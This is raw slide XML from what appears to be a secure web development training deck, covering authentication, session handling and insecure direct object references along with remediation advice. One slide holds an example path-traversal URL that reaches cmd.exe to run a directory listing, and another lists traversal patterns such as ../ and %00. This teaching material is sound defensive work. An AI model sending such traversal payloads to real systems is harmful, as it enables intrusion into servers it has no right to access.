      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7A1601AE-3AB5-4580-9556-3C20AF0CA3B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>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78359726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181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Let the user to enter the old password when the user changes to a new password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do not rely upon spoof able credentials as the sole form of authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP address, referrer header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Be careful of sending secrets to registered e-mail addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use limited-time-only random numbers to reset access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>send a follow up e-mail as soon as the password has been reset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When allowing registered users to change their e-mail address - send a message to the previous e-mail address before enacting the change</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="76200"/>
            <a:ext cx="7416824" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing Broken Authentication &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7A1601AE-3AB5-4580-9556-3C20AF0CA3B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>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20650191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1752600"/>
            <a:ext cx="8229600" cy="11430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en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session.invalidate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request.getSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session.setAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userid",userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);	</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1143000"/>
            <a:ext cx="8458200" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Invalidating Existing Web Session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3276600"/>
            <a:ext cx="8458200" cy="457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Null</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> the Session Once You Logout:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="20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Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3733800"/>
            <a:ext cx="8229600" cy="11430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en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session.invalidate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request.getSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>response.sendRedirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("login.jsp");	</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="76200"/>
            <a:ext cx="7416824" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing Broken Authentication &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7A1601AE-3AB5-4580-9556-3C20AF0CA3B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Footer Placeholder 11"/>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4270656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 Insecure Direct Object Reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Parameter Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exposing reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.bank.com/accountinfo.jsp?id=4203</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.bank.com/accountinfo.jsp=../../../Windows/System32/cmd.exe?/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>c+dir+c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>:\ </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28</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33156231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448128" cy="715963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing Insecure Direct Object Reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="990600"/>
            <a:ext cx="8458200" cy="5055840"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Avoid exposing private object references to users whenever possible, such as primary keys or filenames</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Validate any private object references extensively with an "accept known good" approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>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Make sure that input does not contain attack patterns like ../ or %00</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Use an index value, reference map or a one way hash of the file name to prevent parameter manipulation attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.example.com/application?file=Yogesh.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.example.com/application?file=145</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.example.com/application?file=MS34D</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29</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9161594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20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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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Footer Placeholder 2"/>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dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Aujas Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2744153"/>
            <a:ext cx="8915400" cy="2152650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="82124" tIns="41061" rIns="82124" bIns="41061" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="http://www.theperfectfuture.com/images/who_we_are.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="2743200"/>
            <a:ext cx="3370609" cy="2148840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485130" y="2839403"/>
            <a:ext cx="4806950" cy="136207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bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Remediation Techniques</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="6261100"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{55C5F7CD-489D-44B8-847B-0811A0E37738}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1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536429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0" y="0"/>
            <a:ext cx="7448128" cy="715963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
